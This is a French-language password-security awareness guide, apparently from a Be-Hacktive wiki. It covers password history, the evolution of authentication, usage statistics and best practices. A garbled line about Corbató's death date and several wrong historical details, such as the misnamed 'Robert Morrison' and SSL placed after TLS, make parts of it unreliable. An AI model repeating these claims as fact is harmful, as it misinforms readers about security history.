Les Romains de l'Antiquité utilisaient également beaucoup les mots de passe de la même manière et les appelaient "**watchwords**". Chaque nuit, les gardes militaires romains faisaient circuler une tablette de bois sur laquelle était inscrit le mot de passe. Les militaires faisaient circuler la tablette jusqu'à ce que chaque campement inscrive ses initiales. Cela permettait de détecter les ennemis déguisés en Romains.

<figure><img src="/files/iRqM2GzI4XPZjVxUD1wY" alt=""><figcaption></figcaption></figure>

### Les mots de passe dans la littérature

Au XVIIIe siècle, "Ali Baba et les quarante voleurs", inventé par l'orientaliste français[ Antoine Galland](https://fr.wikipedia.org/wiki/Antoine_Galland), raconte l'histoire du mot de passe "Sésame ouvre-toi". Ali Baba, un pauvre marchand, entend des voleurs parler de leur horde d'or derrière la paroi d'une grotte. Pour ouvrir la grotte, il faut prononcer les mots "Sésame ouvre-toi". Ali Baba se met à l'abri et vole le plus de butin possible. Plus tard dans l'histoire, l'oncle d'Ali Baba a vent de l'or et se rend à la grotte. Une fois à l'intérieur, il referme rapidement la paroi rocheuse derrière lui pour s'assurer d'avoir l'or pour lui tout seul. L'oncle charge avidement des sacs et des sacs pleins d'or. En se retournant pour partir, il se rend compte qu'il a oublié le mot de passe pour ouvrir la porte.

Malheureusement pour l'oncle, il n'a aucun moyen de réinitialiser le mot de passe et reste coincé à l'intérieur en attendant le retour des voleurs. (L'importance des fonctions de réinitialisation des mots de passe !  😂)

<figure><img src="/files/fzRPKXJhCN4IuBaEMg9m" alt=""><figcaption><p>Même dans l'histoire les mots de passes compromis avaient un gros impact et des gains intéressants pour l'attaquant ! <span data-gb-custom-inline data-tag="emoji" data-code="1f604">😄</span></p></figcaption></figure>

### Le mot de passe de la prohibition

De 1920 à 1930 aux Etats-Unis, c'est la période qu'on appelle la prohibition au cours de laquelle la vente d'alcool était interdite dans le pays ainsi que la fabrication, le transport, la vente, l'importation et l'exportation des boissons alcoolisées (SOURCE: [WIKIPEDIA](https://fr.wikipedia.org/wiki/Prohibition#:~:text=La%20prohibition%20d%C3%A9signe%20surtout%20la,l'exportation%20de%20boissons%20alcoolis%C3%A9es.)).&#x20;

Les gens ne pouvaient légalement se procurer ou consommer de l'alcool que pour des raisons médicales ou religieuses, des milliers de bars ont été donc contraints de fermer leurs portes. Mais les propriétaires de bars ont vite compris qu'ils pouvaient toujours vendre de l'alcool à huis clos. Ces bars, connus sous le nom de **speakeasies**, étaient ouverts aux hommes et aux femmes mais la présentation d'une carte, d'une phrase codée ou d'un mot de passe permettant d'entrer dans l'établissement était obligatoire.&#x20;

Les mots de code étaient pour le moins ridicules : vernis de cercueil, rhum de singe, sueur de panthère et jus de tarentule, pour n'en citer que quelques-uns.

<figure><img src="/files/T82Ot3qtOHy4s1KM9Jo0" alt=""><figcaption><p>Exemples de cartes utilisés pour les "speakeasy" bars durant la prohibition.</p></figcaption></figure>

### Le premier mot de passe numérique

En 1960, [**Fernando Corbato**](https://fr.wikipedia.org/wiki/Fernando_Corbat%C3%B3), professeur au MIT, s'est rendu compte qu'il devait également utiliser des "mots de passe" lorsqu'il a construit un grand ordinateur partagé, le CTSS.&#x20;

{% hint style="info" %}
**CTSS**:

**CTSS**, qui signifie **C**ompatible **T**ime-**S**haring **S**ystem (en français, « système accomplissant du temps partagé compatible »), est l'un des premiers systèmes d'exploitation à temps partagé. Il fut développé par le Projet MAC au MIT.

\
Source: [**WIKIPEDIA**](https://fr.wikipedia.org/wiki/Compatible_Time_Sharing_System#:~:text=CTSS%2C%20qui%20signifie%20Compatible%20Time,le%20Projet%20MAC%20au%20MIT.)
{% endhint %}

Les utilisateurs auraient tous besoin d'accéder à différents fichiers sans avoir l'autorisation d'accéder au terminal des autres !&#x20;

\=> **La solution : chaque utilisateur aurait son propre mot de passe.**&#x20;

EEEEEEBien que Corbato, décédé en 201S9, n'ait jamais accepté le mérite du premier mot de passe informatique, il y est néanmoins accrédité.

## Maintenant et Après

Aujourd'hui, il existe des mots de passe pour presque tout. Chaque personne en possède une centaine, qui sont souvent partagés entre la famille, les amis et les collègues de travail (Netflix, par exemple). (Essayer de se souvenir de tous ces détails au quotidien a entraîné une grande lassitude à l'égard des mots de passe. \
**Et surtout de l'utilisation de mots de passe simples et répétitifs.**

L'époque où il était acceptable de stocker les mots de passe sur une note adhésive ou dans une feuille de calcul (EXCEL SHEET pour les anglophones :joy:) est révolue. Aujourd'hui, les gestionnaires de mots de passe dotés d'un système de remplissage automatique et de fonctions de sécurité essentielles telles que l'authentification à deux facteurs (2FA) et la biométrie peuvent vous aider à accéder en toute sécurité à vos comptes, sur tous vos appareils, en quelques secondes.


# Passwords - Evolution de l'authentification

<figure><img src="/files/mbn9kRlm7f4Q7szqb5FZ" alt=""><figcaption></figcaption></figure>

## Années 60

### Mots de passe à l'ancienne

L'histoire de l'authentification commence avec les mots de passe dans les années 1960, lorsque les premiers ordinateurs ont été mis à la disposition du grand public.&#x20;

À l'époque, les ordinateurs étaient énormes, ridiculement chers et lents - par rapport aux normes actuelles. Le fait que seule une poignée d'universités et de grandes entreprises possédaient un véritable ordinateur rendait la demande exceptionnellement élevée. Pour répondre à cette demande, des universités telles que le MIT ont introduit des systèmes d'exploitation à temps partagé tels que le Compatible Time-Sharing System (CTSS), qui permettait à plusieurs utilisateurs de partager les ressources fournies par un seul ordinateur.

En résolvant le problème de la demande, la confidentialité des fichiers au sein d'un système de fichiers partagés est devenue un défi. Il est important de noter que les utilisateurs étaient des chercheurs et des étudiants qui utilisaient l'ordinateur pour calculer et stocker leurs recherches et leurs nouvelles découvertes - personne ne s'inquiétait de perdre son dossier "vie privée".&#x20;

En fait, tout le monde avait accès à tout. La solution est apparue en 1961 grâce à Fernando Corbató, chercheur puis professeur au MIT.

Corbató a mis en place un programme de mot de passe simple, c'est-à-dire très rudimentaire:

* <mark style="color:red;">**Les mots de passe étaient stockés dans un fichier en clair dans le système de fichiers.**</mark>&#x20;

Il n'a pas fallu longtemps pour que quelqu'un déchiffre le code. **Allan Scherr, dans une tentative de prolonger sa session limitée à quatre heures d'utilisation de l'ordinateur du MIT, a simplement trouvé l'emplacement du fichier et imprimé la liste complète des mots de passe des utilisateurs.**

<figure><img src="/files/BtGEa4i5DI6iXvd4r7Uz" alt=""><figcaption><p>Photo du professeur Corbató</p></figcaption></figure>

## Années 70

### Début 70

La conclusion des années 60 était claire :&#x20;

* <mark style="color:red;">**stocker les mots de passe dans un fichier en clair est une mauvaise idée.**</mark>&#x20;

Les erreurs commises par le passé ont poussé le développement à ajouter un membre supplémentaire à l'histoire de l'authentification. Robert Morrison a repris un concept de la **cryptographie**: la **fonction de hachage**.&#x20;

{% hint style="info" %}
**Cryptographie:**

En général, la cryptographie est une technique d'écriture où un message chiffré est écrit à l'aide de codes secrets ou de clés de chiffrement. La cryptographie est principalement utilisée pour protéger un message considéré comme confidentiel.\
Cette méthode est utilisée dans un grand nombre de domaines, tels que la défense, les technologies de l'information, la protection de la vie privée, etc. Il existe de nombreux algorithmes cryptographiques qui peuvent être utilisés pour chiffrer (et déchiffrer pour le destinataire) le message.\
\
Définition: [**ORACLE**](https://www.oracle.com/fr/security/qu-est-ce-que-la-cryptographie.html#:~:text=En%20g%C3%A9n%C3%A9ral%2C%20la%20cryptographie%20est,un%20message%20consid%C3%A9r%C3%A9%20comme%20confidentiel.)
{% endhint %}

{% hint style="info" %}
**Fonction de hachage:**

1\) On nomme fonction de hachage une fonction particulière qui, à partir d'une donnée fournie en entrée, calcule une *empreinte* servant à identifier rapidement, bien qu'incomplètement, la donnée initiale. Les fonctions de hachage sont utilisées en informatique et en cryptographie.

Définition: [**Techno-Science**](https://www.techno-science.net/glossaire-definition/Fonction-de-hachage.html)\
\
2\) L’utilisation d’une fonction de **hachage** permet de ne pas stocker les mots de passe en clair dans la base mais uniquement de stocker une empreinte de ces derniers. Il est important d’utiliser un algorithme public réputé fort afin de calculer les dites empreintes. **A ce jour, MD5 ne fait plus partie des algorithmes réputés forts**.\
\
Définition: [**CNIL**](https://www.cnil.fr/fr/definition/hachage)
{% endhint %}

Lorsque la fonction de hachage est devenue une norme, les pirates informatiques ont réussi à la contourner. Une protection supplémentaire a été introduite sous la forme de "salage"(de l'anglais **SALT**) des éléments aléatoires qui rendaient le hachage initial encore plus unique et difficile à décrypter. Le stockage des mots de passe par hachage a constitué une **véritable percée** à l'époque.

{% hint style="info" %}
**Salage (SALT):**\
Le **salage est une méthode** permettant de **renforcer la sécurité** des informations qui sont destinées à être hachées (par exemple des mots de passe) en y ajoutant une donnée supplémentaire afin d’empêcher que deux informations identiques ne conduisent à la même empreinte (la résultante d’une fonction de hachage). Le but du salage est de lutter contre les attaques par analyse fréquentielle, les attaques utilisant des[ **rainbow tables**](https://fr.wikipedia.org/wiki/Rainbow_table), les attaques par dictionnaire et les attaques par force brute. Pour ces deux dernières attaques, le salage est efficace quand le sel utilisé n’est pas connu de l’attaquant ou lorsque l’attaque vise un nombre important de données hachées toutes salées différemment.\
\
Définition: [**WIKIPEDIA**](https://fr.wikipedia.org/wiki/Salage_\(cryptographie\))
{% endhint %}

### Milieu 70

Outre le hachage, d'autres techniques de cryptographie se sont avérées bénéfiques pour le développement de l'authentification. La cryptographie asymétrique, plus connue sous le nom d'infrastructure à clé publique, est l'une de ces techniques. Sans entrer dans les détails de son fonctionnement, cette technologie repose sur deux clés. Une clé publique que l'on peut partager en toute sécurité avec le reste du monde afin de prouver son identité, et une clé privée pour la signature numérique utilisée pour vérifier son identité. Un certificat numérique est en fait une combinaison des deux - un certificat de clé publique signé avec votre clé privée pour vérifier qu'il vous appartient.

Cependant, l'utilisation généralisée de l'infrastructure à clé publique n'a pas eu lieu avant le début des années 90. La raison est que cette technologie était hautement confidentielle et réservée aux institutions gouvernementales.

## Années 80

Alors que les mesures de sécurité se renforcent, les pirates informatiques se multiplient. Le secteur de la sécurité doit donc constamment améliorer son jeu et rechercher des solutions d'authentification plus sûres. Les mots de passe statiques n'étaient plus fiables. Les pirates pouvaient facilement voler, intercepter ou deviner votre mot de passe et le rejouer autant de fois qu'ils le souhaitaient. C'est dans ce contexte qu'est née une idée. Et si un utilisateur disposait d'un mot de passe complètement différent à chaque fois qu'il souhaite accéder à un service ? C'est à cette époque que sont nés les mots de passe à usage unique.

Lors de l'élaboration du concept d'authentification par mot de passe unique, deux défis principaux doivent être relevés :

Comment générer aléatoirement un nouveau mot de passe imprévisible que le système reconnaît comme correct ? Comment transmettre ces mots de passe dynamiques aux utilisateurs finaux ? Après avoir trouvé les réponses aux défis susmentionnés, le produit final était un OTP basé sur le temps, délivré par le biais d'un matériel spécial. Au fil des ans, les normes OTP ont évolué, passant de méthodes basées sur le temps, le défi/réponse, le hachage à des méthodes basées sur l'événement. La livraison des OTP a finalement abandonné le besoin d'un dispositif matériel spécifique - les mots de passe à usage unique sont livrés par SMS, par courrier électronique ou par des applications mobiles spécialisées.

## Années 90

### L'émergence de l'infrastructure à clé publique

Le secret des années 70 autour de l'infrastructure à clé publique a finalement été dévoilé durant les années 90. La force motrice derrière la nécessité de la PKI (Public Key Infrastructure) était l'avènement du World Wide Web. Avec une multitude de données confidentielles en ligne, l'identification des utilisateurs de services est devenue cruciale.

Comme mentionné précédemment, la PKI intègre des certificats numériques ainsi que des paires de clés privées et publiques. Cela a conduit au développement du protocole SP4, qui a ensuite été rebaptisé en protocole [**TLS (Transport Layer Security)**](https://fr.wikipedia.org/wiki/Transport_Layer_Security), plus largement reconnu. Quelques années plus tard, le protocole [**SSL (Secure Sockets Layer)**](https://www.globalsign.com/fr/centre-information-ssl/definition-ssl) a été introduit, incluant l'authentification du serveur et les composants clés.

Au fil du temps, les fonctions principales de la technologie PKI ont évolué pour inclure les éléments suivants : la création, le stockage et la distribution des certificats numériques. Ces fonctions comprennent également :

* **CA (Autorité de Certification):** chargé de délivrer et de signer les certificats numériques
* **RA (Autorité d'Enregistrement):** responsable de la vérification de l'identité des utilisateurs soumettant des demandes de certificats numériques
* **Répertoire central:** destiné au stockage des clés
* **CMS (Système de Gestion des Certificats):** gérant les activités opérationnelles (accès aux certificats stockés, etc.)
* **Politique de certification:** une déclaration décrivant les exigences de la PKI

## Années 2000

### L'avènement de l'authentification à facteurs multiples et de la connexion unique (SSO)

L'authentification à facteurs multiples (MFA) nécessite une combinaison de plusieurs facteurs d'authentification pour vérifier l'identité d'une personne. Avec les OTP des années 80, nous avons commencé à effleurer ce sujet. Les années 2000 ont éliminé le besoin d'un dispositif matériel spécifique pour générer des mots de passe dynamiques. Les technologies émergentes et la numérisation ont apporté des applications mobiles spécialisées pour MFA et la génération d'OTP utilisateur.

Les trois éléments d'authentification principaux nécessaires pour une vérification réussie de l'identité sont les suivants :

* **Connaissance** - quelque chose que l'utilisateur connaît, comme un code PIN ou un mot de passe.&#x20;
* **Possession** - quelque chose que l'utilisateur possède ; un certificat numérique, une carte à puce, un appareil mobile, etc.&#x20;
* **Inhérence** - quelque chose qui vérifie directement que c'est l'utilisateur, c'est-à-dire des informations biométriques (par exemple, la reconnaissance des empreintes digitales, du visage ou de la voix).

L'authentification réussie implique la combinaison d'au moins deux éléments de sécurité. Si un attaquant obtient un mot de passe, il devrait également avoir accès au deuxième ou même au troisième facteur utilisé pour s'authentifier.&#x20;

**La connexion unique (SSO - Single Sign-On)** a représenté une avancée significative dans le domaine de l'authentification. Le principe de base de la SSO est que les utilisateurs ne peuvent pas être considérés comme fiables avec les mots de passe. Nous avons tendance à sous-estimer l'importance des mots de passe, à les réutiliser à plusieurs reprises et parfois même à les partager avec des amis, des membres de la famille ou des collègues. Il n'est pas étonnant que nous oublions nos mots de passe puisque nous en avons besoin d'un différent pour chaque service que nous utilisons. Pour résoudre ces problèmes et d'autres encore, le concept d'un tiers de confiance responsable de la vérification d'identité est né.

La SSO repose sur un tiers de confiance pour authentifier les utilisateurs, éliminant ainsi le besoin de vérifier les informations d'identification sur chaque site web ou service. Lorsqu'un utilisateur se connecte à un site web, le site vérifie si un fournisseur de SSO a déjà authentifié cet utilisateur. Si la vérification est réussie, l'utilisateur accède au site sans avoir besoin de se connecter à nouveau ; sinon, l'utilisateur doit se connecter au site web. Bien que pratique, la SSO présente également certains risques. Par exemple, si le compte Gmail d'un utilisateur est compromis, tous les sites web ou services pour lesquels il a utilisé Gmail pour se connecter sont également exposés au risque.

## Années 2010

### Les biométriques ne sont plus uniquement dans les films

L'authentification biométrique utilise les caractéristiques physiques pour déterminer l'identité de l'utilisateur. Cela comprend la numérisation des empreintes digitales, la reconnaissance faciale, la reconnaissance vocale, la numérisation de l'iris, etc. Fondamentalement, les biométriques couvrent l'élément d'authentification "quelque chose que vous êtes" dans l'exigence de l'authentification forte.

À la surprise de tous, les iPhones n'ont pas été les premiers à intégrer des biométriques dans leur offre. Le tout premier smartphone permettant l'authentification par empreinte digitale était le Motorola ATRIX, alimenté par Android. Apple a suivi le même chemin trois ans plus tard en remplaçant la fonction pratique des empreintes digitales par Face ID en 2017. 30 000 points infrarouges scannent le visage de l'utilisateur et déterminent son identité.

Aujourd'hui, les biométriques font partie de notre routine quotidienne - déverrouillage de nos smartphones, confirmation d'achats en ligne, etc. Ils sont extrêmement difficiles à falsifier et sont considérés comme l'une des méthodes d'authentification les plus sécurisées disponibles. Cependant, des débats sur les préoccupations liées à la vie privée continuent de soulever des questions juridiques.


# Passwords - Statistiques

Une étude google sur l'utilisation des mots de passe par les utilisateurs américains est sortie en 2019 ainsi qu'une étude de Ponemon Institute en 2020.&#x20;

Le Ponemon Institute est considéré comme le principal centre de recherche consacré à la protection de la vie privée, à la protection des données et à la politique de sécurité de l'information.

Yubico a publié son deuxième rapport annuel sur l'état des comportements en matière de sécurité des mots de passe et de l'authentification, réalisé par l'Institut Ponemon en 2020. L'étude a porté sur 2 507 praticiens de la sécurité informatique en Australie, en France, en Allemagne, en Suède, au Royaume-Uni et aux États-Unis, ainsi que sur 563 utilisateurs individuels.

L'étude Google est présente en version originale via ce [**LIEN**](https://storage.googleapis.com/gweb-uniblog-publish-prod/documents/PasswordCheckup-HarrisPoll-InfographicFINAL.pdf)**.**\
L'étude Ponemon Institute en version originale se trouve [**ICI**](https://mms.businesswire.com/media/20200219005336/en/773763/5/191522-Ponemon-Infographic-2020-final-1.jpg?download=1).

## Statistiques et habitudes en matière de mots de passe faibles

Alors que les capacités des cybercriminels continuent d'évoluer, nos habitudes de gestion des mots de passe et notre compréhension des bonnes pratiques de cybersécurité n'ont pas suivi le même rythme. Cela vaut aussi bien pour les particuliers que pour les entreprises, comme le montrent les statistiques ci-dessous.

### Google

* **75 %** des Américains se disent **frustrés** de devoir conserver leurs mots de passe et d'en garder la trace.
* **24%** des Américains ont utilisé le mot "**password**", "**Qwerty**" ou "**123456**" comme mot de passe.&#x20;
* **43 %** des Américains ont **partagé leur mot de passe** avec quelqu'un.
* **20 %** des Américains **ont partagé le mot de passe de leur compte de messagerie**.
* Seuls **37 %** des Américains **utiliseront l'authentification à deux facteurs** pour sécuriser leurs mots de passe **en 2020**.
* Seuls **34 %** des Américains **déclarent changer régulièrement leurs mots de passe**.
* Seulement **15 %** des Américains **utilisent un gestionnaire de mots de passe** en ligne.
* **66 %** des Américains **utilisent le même mot de passe pour plusieurs comptes** en ligne.
* **27 %** des Américains **ont déjà essayé de deviner le mot de passe** de quelqu'un d'autre, et **17 % d'entre eux ont réussi à le deviner correctement**.
* **13 %** des Américains **ont déclaré avoir réutilisé leur mot de passe** sur tous leurs comptes en 2019.&#x20;
* Seuls **32%** des Américains ont été en mesure de **définir correctement les**[ **te**](#user-content-fn-1)[^1]**rmes "phishing", "gestionnaire de mot de passe" et "vérification en deux étapes"**.

### Ponemon Insitute

* **42%** des organisations s'appuient sur des **post-it pour la gestion des mots de passe**.
* **59%** des organisations s'appuient sur la **mémoire humaine pour gérer les mots de passe**.
* **62%** des entreprises déclarent **ne pas prendre les mesures nécessaires pour sécuriser correctement les données mobiles**.&#x20;

## Statistiques sur la sécurité des mots au niveau des entreprises

Les cybercriminels ne sont pas seulement une menace pour les particuliers, ils représentent également un risque important pour les grandes entreprises de tous les secteurs d'activité. Cela dit, tous les secteurs ne sont pas logés à la même enseigne. Les règles de conformité varient considérablement d'un secteur à l'autre, et certaines industries sont plus promptes que d'autres à adopter et à maintenir des mesures de sécurité appropriées. Par exemple, les entreprises de technologie et de logiciels sont souvent très diligentes dans leurs défenses de cybersécurité, alors que les compagnies d'assurance sont souvent à la traîne.

### Lastpass Report

[**Lien du rapport.**](https://lp-cdn.lastpass.com/lporcamedia/document-library/lastpass/pdf/en/LMI0828a-IAM-LastPass-State-of-the-Password-Report.pdf)

* **37% des employés des entreprises technologiques et logicielles utilisent l'authentification multi-facteurs (MFA)** - l'utilisation de deux ou plusieurs facteurs distincts pour la vérification et l'autorisation d'un utilisateur.&#x20;
* **33% des employés du secteur de l'éducation utilisent l'AFM et 32% des employés du secteur bancaire ou financier utilisent l'AFM**.&#x20;
* Dans le bas de l'échelle, **seuls 20 % des employés du secteur juridique ou de l'assurance utilisent l'AMF**.&#x20;

#### Réutilisation des mots de passe

On parle de réutilisation de mot de passe lorsqu'une personne utilise le même mot de passe pour plusieurs comptes et services en ligne, par exemple en utilisant le même mot de passe pour son adresse électronique et son compte bancaire. De nombreuses personnes réutilisent un mot de passe parce qu'il est plus facile pour elles de mémoriser un mot de passe plutôt que plusieurs.

* Les employés des médias et de la publicité réutilisent leurs mots de passe presque deux fois plus que les employés des autres secteurs.&#x20;
* Les employés du secteur à but non lucratif sont ceux qui réutilisent le moins de mots de passe (environ 9 en moyenne).&#x20;
* Les employés du secteur des technologies ou des logiciels réutilisent environ 15 mots de passe en moyenne.&#x20;

## Problématique

Les chiffres ne sont pas très représentatifs pour les pays "Francophones" (Belgique, France, Maroc,...). \
Be-Hacktive va donc lancer sa campagne pour enquêter sur l'habitudes des utilisateurs francophones. \
\
Le lien de l'enquête sera bientôt disponible et forcément ANONYME :smile:

[^1]:


# Passwords - Protégez-vous

<figure><img src="/files/AcM0smyYt332kf2s1fMQ" alt=""><figcaption><p>Source: <a href="https://www.cybermalveillance.gouv.fr/tous-nos-contenus/bonnes-pratiques/mots-de-passe"><strong>CYBERMALVEILLANCE.GOUV.FR</strong></a></p></figcaption></figure>

Les pirates récoltent, utilisent et vendent les mots de passe des entreprises et des particuliers afin d'obtenir des récompenses financières, de nuire à la réputation, de voler la propriété intellectuelle ou de mener d'autres activités illégales.&#x20;

**Il faut adopter des bons réflexes concernant les mots de passes que ce soit dans l'utilisation privée ou professionnelle, voici une liste non-exhaustive.**

Cette situation est due en grande partie au manque d'éducation des employés et à la négligence des entreprises. Au sein de votre organisation, préconisez un effort concerté, à l'échelle de l'entreprise, en matière de sécurité et de protection des mots de passe.

## 11 bonnes pratiques en matière de sécurité des mots de passe

### 1- Mots de passe uniques pour chaque compte

Utilisez des mots de passe différents pour chaque compte, de sorte que si l'un d'entre eux est compromis, les autres ne le soient pas. Cela permet d'éviter les attaques de type "**credential-stuffing**", où les pirates utilisent des identifiants volés sur d'autres plateformes communes dans l'espoir d'y pénétrer.

{% hint style="info" %}
**Credential-Stuffing:**

Le "**Credential stuffing**" est une méthode de cyberattaque dans laquelle les attaquants utilisent des listes d'identifiants d'utilisateurs compromis pour s'introduire dans un système. L'attaque utilise des robots pour l'automatisation et se base sur l'hypothèse que de nombreux utilisateurs réutilisent des noms d'utilisateur et des mots de passe à travers de multiples services.

SOURCE: [**IMPERVA.COM**](https://www.imperva.com/learn/application-security/credential-stuffing/#:~:text=Credential%20stuffing%20is%20a%20cyberattack,and%20passwords%20across%20multiple%20services.)
{% endhint %}

### **2-**&#x43;aractères et symboles au lieu de lettres

Des phrases utilisant des symboles tels qu'un smiley " :)" au lieu du mot "heureux", ou remplaçant le mot "à" par le chiffre "2". L'utilisation de caractères et de symboles à la place de lettres peut rendre votre mot de passe plus difficile à deviner pour les pirates informatiques ou les techniques d'attaque par force brute.

### 3-Passphrases

L'une des meilleures pratiques en matière de sécurité des mots de passe consiste à utiliser des phrases de passe composées de mots qui ne vont normalement pas ensemble, plutôt que des mots de passe à longs caractères faciles à oublier. Des mots de passe tels que "chiot avion mangeant une banane" sont plus faciles à mémoriser et moins susceptibles d'être piratés que "chiot courant dans le jardin".&#x20;

**Utilisez au moins quatre mots dans votre phrase de passe tout en respectant le point 2 (Caractères et symboles).**

### **4-**&#x41;u moins 12 caractères

Pour une sécurité optimale des mots de passe, nos meilleures pratiques recommandent d'utiliser au moins douze caractères interchangeables (minuscules, majuscules, symboles et chiffres) dans votre mot de passe, que vous utilisiez ou non une phrase de passe. La longueur du mot de passe est plus importante pour la sécurité que l'utilisation de chiffres, de caractères ou de symboles. La longueur du mot de passe est un indicateur majeur du temps qu'il faudra à un mot de passe pour être déchiffré par une attaque par force brute ou par un autre algorithme de piratage de mot de passe.

### 5-Analyser la force du mot de passe

Vérifiez toujours la force de votre mot de passe. La plupart des sites proposent un analyseur de mot de passe qui indique la force ou la faiblesse de votre mot de passe. Prêtez attention aux résultats de l'analyseur et modifiez votre mot de passe en conséquence pour le rendre plus fort.

Nexcess propose un outil unique de génération de mots de passe qui vous permet de créer des mots de passe compliqués, de générer des phrases de passe ou même de vérifier la force de vos mots de passe existants facilement et en toute sécurité, le lien ci-dessous:

\=> [**Nexcess: Random password generator**](https://www.nexcess.net/web-tools/secure-password-generator/)

<figure><img src="/files/gRsiHAqzSSfDK0poTwQN" alt=""><figcaption><p>La page principal du site de Nexcess pour générer un mot de passe ou vérifier la robustesse de celui-ci.</p></figcaption></figure>

### 6-Changer de mot de passe tous les trimestres

Les mots de passe peuvent toujours être devinés ou craqués si l'on dispose de suffisamment de temps. C'est pourquoi vous devez changer votre mot de passe tous les 60 à 90 jours pour les comptes d'utilisateur surtout dans les entreprises. Cela permet de s'assurer que les pirates qui utilisent l'ingénierie sociale, la force brute et le credential-stuffing ne peuvent pas utiliser vos anciens mots de passe pour accéder à vos systèmes ou à vos données.

Bien évidemment dans la pratique, il est parfois très difficile de se rappeler tous les mots de passes mais encore plus compliqué les dates pour les changer. \
Dans les sociétés, il y a des polices mises en place automatiquement pour rappeler et forcer le changement de mot de passe.

### 7-Activer l'authentification à deux facteurs

Utilisez l'authentification à deux facteurs (2FA), également connue sous le nom d'authentification multifactorielle. Il s'agit d'une méthode d'authentification basée sur un texte ou une application qui permet de vérifier votre identité avant l'accès. Même si un pirate informatique obtient votre mot de passe d'une manière ou d'une autre, il ne pourra pas accéder à vos systèmes s'il n'a pas également accès à votre téléphone ou à votre boite mail par exemple.

### 8-Utiliser un gestionnaire de mots de passe&#x20;

Enfin, optez pour un gestionnaire de mots de passe.&#x20;

Les gestionnaires de mots de passe utilisent plusieurs formes de chiffrement pour s'assurer que vos mots de passe sont encore plus difficiles à déchiffrer et vous permettent de ne retenir qu'un seul mot de passe. Les phrases de passe sont parfaites pour être utilisées comme mot de passe principal dans votre gestionnaire de mots de passe, puis vous pouvez utiliser des mots de passe extrêmement difficiles pour vos autres comptes d'utilisateur et systèmes.

### 9- Vérifier vos identifiants contre les les fuites de données

Une autre bonne pratique en matière de sécurité des mots de passe consiste à utiliser un outil de sécurité tel que Have I Been Pwned pour vérifier si vos informations d'identification ont été incluses dans des violations de données récentes à l'échelle mondiale. Cela vous permet de prendre des décisions éclairées sur les mots de passe qui doivent être modifiés immédiatement.

Un article complet a été fait sur notre blog BE-HACKTIVE:

[**=> Suis-je victime des fuites de données ?**](https://blog.be-hacktive.com/articles-cybersecurite/suis-je-victime-des-fuites-de-donnees)

### 10-Ne jamais utiliser d'informations personnelles dans un mot de passe&#x20;

N'utilisez jamais votre prénom, votre nom de famille, votre âge, votre anniversaire, votre numéro de téléphone, votre adresse, votre compte bancaire ou toute autre information personnelle sensible dans votre mot de passe. N'utilisez même pas le nom de votre chien ou votre lieu de voyage préféré. La plupart de ces informations sont disponibles sur votre compte Facebook ou autre site/réseau social et donc sont accessibles pour les attaquants.

### 11-Gardez vos mots de passe confidentiels

En bref, ne partagez pas vos mots de passe. C'est particulièrement vrai lorsque quelqu'un entame une conversation avec vous et vous demande votre mot de passe mais aussi un proche qui vous demande des accès à vos comptes.

En général, gardez votre mot de passe aussi confidentiel que votre code PIN bancaire. C'est aussi important que cela.

## Bonnes pratiques pour les équipes IT

<figure><img src="/files/hzbmVcmCwoGxkuBlUZ7j" alt=""><figcaption></figcaption></figure>

Lorsque vous êtes en charge de l'implémentation des règles de mots de passe dans votre équipe IT, il est bien de garder en tête les points suivants:

* Limiter les tentatives de connexion incorrectes à 5 ou moins
* Autoriser les mots de passe de 64 caractères ou plus, plutôt que de limiter la longueur à 8 ou 12 caractères.
* Mettre en place une authentification multifactorielle. L'authentification multifactorielle ou à deux facteurs empêche les attaquants d'accéder à vos portails ou à votre réseau après avoir déchiffré de simples mots de passe.
* Déployer un logiciel de gestion des accès privilégiés pour les employés ayant accès à des données sensibles.
* Veiller à ce que votre organisation utilise des solutions anti-malware et de gestion des vulnérabilités à jour.
* Adopter la pratique consistant à changer les mots de passe des comptes de l'entreprise lorsqu'un employé quitte l'entreprise.
* Éviter les connexions aux comptes en tant que "root" ou "administrator". Utiliser votre propre login et changer d'utilisateur (SUDO) ou "runas" afin d'exécuter les commandes d'administration.&#x20;
* Envisager de désactiver l'accès des comptes "root" ou "administrator".
* Mettre en place des audits de mots de passe. Vérifier que vos employés respectent la politique de sécurité des mots de passe de l'organisation. Un audit contrôlera les modifications apportées aux mots de passe afin d'en assurer la conformité. Il permettra également de mettre en évidence et de corriger les points d'accès faibles.
* Envoyer aux employés des rappels sur les meilleures pratiques en matière de mots de passe. Les employés ont généralement de bonnes intentions, mais ils peuvent oublier de mettre à jour leurs mots de passe ou de se conformer à la politique de l'organisation en matière de mots de passe.&#x20;
* Envoyer aux employés des notifications par courrier électronique leur rappelant les politiques, les meilleures pratiques et la nécessité d'effectuer une rotation des mots de passe avant leur expiration.
* Proposer des sessions d'entrainement sur les meilleurs pratiques en matière de mots de passe.

## Points de contact

### Belgique

* Le CCB (Centre pour la Cybersécurité Belgique) a mis en place une adresse mail&#x20;

  <suspect@safeonweb.be> pour signaler volontairement les mails de phishing.

{% hint style="info" %}
" Le but de <suspect@safeonweb.be> est simple : nous faisons appel aux internautes pour qu’ils signalent volontairement à cette adresse les messages suspects qu’ils reçoivent, les fameux messages de phishing. Nous contrôlons alors les URL et les annexes de ces messages envoyés. C’est un processus automatisé. Nous faisons bloquer les liens suspects. Ce dispositif permet de protéger les internautes moins vigilants qui ont cliqué sur le lien."&#x20;

Source: [**Safeonweb.be**](https://www.safeonweb.be/fr/quest-ce-que-suspectsafeonwebbe)
{% endhint %}

* Le SPF Economie a mis en place un point de contact pour toutes les fraudes, tromperies, arnaques et escroqueries via le lient suivant: <https://pointdecontact.belgique.be/meldpunt/fr/bienvenue>

{% hint style="info" %}
Lorsque vos droits en tant que consommateur ou entreprise ont été violés ou que vous êtes victime d’une forme de tromperie, vous pouvez le signaler via ce nouveau site. Le point de contact donne un avis sur mesure et vous oriente vers l’instance appropriée.

Le point de contact est le résultat de la collaboration entre l’Agence fédérale pour la sécurité de la chaîne alimentaire (AFSCA), l’Agence fédérale des médicaments et des produits de santé (AFMPS), le Service d’information et de recherche sociale (SIRS), la Police fédérale, le SPF Finances et le SPF Economie.

Source: [**Police.be**](https://www.police.be/5998/fr/questions/prevention/point-de-contact-pour-fraudes-tromperies-arnaques-et-escroqueries)
{% endhint %}

### France

#### Cybermalveillance

Le gouvernement français à mis en place le site suivant:

* [**Cybermalveillance.gouv.fr**](https://www.cybermalveillance.gouv.fr/) a pour missions d'assister les particuliers, les entreprises, les associations, les collectivités et les administrations victimes de cybercriminalité, de les informer sur les menaces numériques et les moyens de s'en protéger.


# Définition et Méthodologie

